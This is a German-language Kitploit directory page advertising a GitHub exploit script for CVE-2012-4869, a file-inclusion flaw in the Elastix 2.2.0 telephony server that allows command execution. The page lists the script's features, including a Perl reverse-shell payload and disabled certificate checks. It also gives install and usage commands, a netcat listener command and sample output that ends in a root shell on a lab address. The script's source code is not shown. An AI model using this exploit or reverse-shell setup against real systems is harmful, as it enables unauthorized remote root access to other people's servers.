Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Elastix-2.2.0-CVE-2012-4869 | Kitploit
Tools/GitHubGitHub/cyberdesu/elastix-2.2.0-cve-2012-4869
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubcyberdesu/elastix-2.2.0-cve-2012-4869

Elastix-2.2.0-CVE-2012-4869

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Elastix 2.2.0 Local-File-Inclusion-Exploit - CVE-2012-4869

Beschreibung

Dieses Skript nutzt eine Local File Inclusion (LFI)-Schwachstelle in Elastix 2.2.0 aus, die Remote-Codeausführung (RCE) ermöglicht, indem Befehle über den callme_page.php-Endpunkt eingeschleust werden. Der Exploit basiert auf CVE-2012-4869.

Funktionen

  • Umgeht die TLS-Zertifikatsprüfung.
  • Verwendet Perl-Reverse-Shell-Payload.
  • Unterstützt benutzerdefinierte LHOST- und LPORT-Werte für die Reverse Shell.
  • Unterdrückt HTTPS-Sicherheitswarnungen.

Anforderungen

  • Python 3
  • requests-Modul

Installiere die Abhängigkeiten mit:

root@kitploit:~
pip install requests

Verwendung

root@kitploit:~
python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>

Beispiel:

root@kitploit:~
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001

Reverse-Shell-Listener einrichten

Starte vor der Ausführung des Exploits einen Netcat-Listener auf deinem Rechner:

root@kitploit:~
nc -lvnp 9001

Ausgabe der Exploit-Ausführung

root@kitploit:~
[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001

[+] Exploit sent successfully, waiting for reverse shell...

[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)

Hinweise

  • Falls die Reverse Shell keine Verbindung herstellt, stelle sicher, dass Firewall-Regeln und SELinux-Einstellungen ausgehende Verbindungen erlauben.
  • Alternative Payloads (z. B. Bash oder Python) können verwendet werden, wenn Perl nicht verfügbar ist.
  • Stelle sicher, dass dein LHOST vom Zielrechner aus erreichbar ist.

Haftungsausschluss

Dieser Exploit dient nur zu Bildungs- und autorisierten Sicherheitstestzwecken. Unbefugte Nutzung ist illegal. Der Autor ist nicht verantwortlich für den Missbrauch dieses Tools.

Tool herunterladen